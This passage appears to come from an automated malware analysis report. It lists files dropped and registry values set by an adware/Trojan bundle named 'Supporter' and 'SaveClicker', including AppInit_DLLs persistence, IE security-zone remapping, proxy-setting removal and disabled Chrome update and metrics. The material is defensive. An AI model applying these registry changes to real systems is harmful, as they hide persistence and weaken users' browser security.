%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.dll (26032 bytes)

Registry activity

The process %original file name%.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 78 77 F2 55 1F 88 C8 DC F8 70 F7 00 BB 01 20"

The process rundll32.exe:892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 FD B5 EC 3E 79 55 29 C6 0B 76 37 DE E4 F2 6A"

The process rundll32.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F E7 38 1D 2D 98 30 A3 D9 05 BF DF 2F 04 6A 25"

The process regsvr32.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 FE 3A 4B 87 4D 4C FE 13 26 44 07 7B 70 90 29"

The process 4t0K2gExXKV.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"InstallDate" = "20141109"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"iiid" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"iiid" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"dbaf3ce3" = "/P////%%"
"587b5709" = "V/////%%"
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"DisplayName" = "Supporter 1.80"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svpath" = "c:\progra~1\suppor~1\SupporterSvc.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"
"0dc3ee96" = "/P////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svx" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svt" = "1415499614"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"Publisher" = "SaveClicker"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"dlpath" = "c:\progra~1\suppor~1\suppor~1.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svn" = "Supporter"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"usr.1" = "oCrXTf6789/XZTVNPR"
"usr.0" = "21/piAXZTVNPRJLFHw"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "c:\progra~1\suppor~1\suppor~1.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"CategoryName" = ""

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 8B 59 48 55 C7 A0 4B 60 EF A9 0D 8C F0 9D 65"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"
"6185d035" = "VP/h/CP/V//l////"
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"data.0" = "YjrXT547KXyi2VNPRJ1MuUFxqLrsWisOQN7iqhhg8TH3YZr0E"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"c24899a6" = "MP/f/CF/Mx/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c/Au/YZ/Z//e/B2/N//l////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"uuid" = "b884ccde-4160bcc6-a8a67a25"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"LRTS" = "0"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"n" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"NoRepair" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"587b5709" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"usr.0" = "21/piAXZTVNPRJLFHw"
"usr.1" = "oCrXTf6789/XZTVNPR"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un /uq"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Install_Dir" = "%Program Files%\Supporter"
"LRTS" = "0"
"svi" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c/Au/YZ/Z//e/B2/N//l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"

"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"date" = "1415499614"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"data.1" = "FldGxS3/Ythm7PRJLFnmaqtOr7VskylRUc0kEmdbLVKd94JiOTfv"
"data.0" = "YjrXT547KXyi2VNPRJ1MuUFxqLrsWisOQN7iqhhg8TH3YZr0E"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"uuid" = "b884ccde-4160bcc6-a8a67a25"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"40030ae4" = "%Program Files%\Supporter\Supporter.dll"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"340d3099" = "///%"
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Version" = "22021985"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"data.1" = "FldGxS3/Ythm7PRJLFnmaqtOr7VskylRUc0kEmdbLVKd94JiOTfv"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"date" = "1415499614"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"
"a0743acc" = "N/////%%"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process gzfJ2GIHr9X.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"SilentUninstall" = "%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe /s /n /i:ExecuteCommands;UninstallCommands %Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe"

[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}\TypeLib]
"Version" = "1.0"
"(Default)" = "{E2343056-CC08-46AC-B898-BFC7ACF4E755}"

[HKCU\Software\RegisteredApplicationsEx]
"71ddc4549a21476f811c4c3e6fdf3195" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"URLUpdateInfo" = ""

"URLInfoAbout" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\SaveClicker.SaveClicker.2.1]
"(Default)" = "SaveClicker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"DisplayName" = "SaveClicker"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\InprocServer32]
"(Default)" = "%Program Files%\SaveClicker\vWxdeLnb7d.dll"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}]
"(Default)" = "IRegistry"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\SaveClicker.SaveClicker.2.1\CLSID]
"(Default)" = "{23153046-D029-C7B7-DBB6-A2E4110CD348}"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\TypeLib]
"(Default)" = "{E2343056-CC08-46AC-B898-BFC7ACF4E755}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"
"_In" = "20141109"

[HKCR\SaveClicker.SaveClicker]
"(Default)" = "SaveClicker"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\TypeLib]
"(Default)" = "{E2343056-CC08-46AC-B898-BFC7ACF4E755}"

[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0\0\win32]
"(Default)" = "%Program Files%\SaveClicker\vWxdeLnb7d.tlb"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"DisplayVersion" = "3.2.0.1472"

[HKCR\SaveClicker.SaveClicker\CLSID]
"(Default)" = "{23153046-D029-C7B7-DBB6-A2E4110CD348}"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"NoModify" = "1"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}]
"(Default)" = "IPlaghinMein"

[HKCR\SaveClicker.SaveClicker\CurVer]
"(Default)" = "SaveClicker.2.1"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{23153046-D029-C7B7-DBB6-A2E4110CD348}" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"CategoryName" = "Apps"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies\Google\Chrome]
"MetricsReportingEnabled" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 21 06 12 84 D7 EF 24 5B 07 28 34 4E CC 95 D8"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}]
"(Default)" = "ILocalStorage"

[HKCR\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

